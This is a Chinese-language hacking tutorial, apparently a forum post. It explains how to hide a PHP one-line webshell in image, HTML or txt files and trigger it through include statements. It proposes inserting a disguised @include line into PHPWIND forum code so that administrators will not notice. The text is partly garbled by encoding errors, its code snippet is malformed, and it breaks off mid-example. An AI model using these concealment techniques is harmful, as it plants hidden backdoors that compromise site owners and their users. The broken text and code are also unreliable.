最近很多朋友都在問(wèn)我是否能把我那一句話木馬隱藏到HTML或圖片里，其實(shí)把一句話木馬插入到PHP文件中就已經(jīng)很隱蔽了，如果說(shuō)硬是要放到HTML文件

或圖片里，就接著往下看的這篇測(cè)試報(bào)告吧。  
   
要知道如果光把PHP語(yǔ)句放到圖片里是無(wú)論如何也不能執(zhí)行的，因?yàn)镻HP只解析擴(kuò)展名為php的文件。所以說(shuō)要能使隱藏在圖片里的PHP語(yǔ)句執(zhí)行。我們就

的借助PHP中的調(diào)用函數(shù) ：include 、require 等。   
　　我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include("x.gif")這樣的語(yǔ)句來(lái)調(diào)用隱藏在圖片的木馬語(yǔ)句。ASP中語(yǔ)句也

類似。看似非常隱蔽但直接調(diào)用圖片對(duì)稍微懂
點(diǎn)PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù)，這就使得插入木馬的性能得不到發(fā)揮。   

　　Include 函數(shù)在PHP中使用的比較頻繁，所以引起的安全問(wèn)題也實(shí)在太多，例如PHPWIND1.36的漏洞就是因?yàn)閕nclude后面的變量沒(méi)做過(guò)濾引起的。由

此我們就可以構(gòu)造類似的語(yǔ)句來(lái)插入到PHP文件
中。然后把木馬隱藏到圖片或HTML文件里，可以說(shuō)隱蔽性就更高了。如在PHPWIND論壇里插入下面的語(yǔ)句：                       

     ＜‘’？@include includ/.$PHPWIND_ROOT；？ ＞[Copy to clipboard]  
   
一般管理員是無(wú)法看出來(lái)的。   

　　有了include 函數(shù)來(lái)輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來(lái)了。因?yàn)閠xt、html和圖片文件這三種

類型的文件最無(wú)論在論壇還是文章系統(tǒng)里是最
為常見(jiàn)的了，下面我們就依次來(lái)做測(cè)試。   

　　首先建立一PHP文件test.php 文件內(nèi)容為:   

    CODE：$test=
[/url]
關(guān)鍵字：黑客 PHP 技巧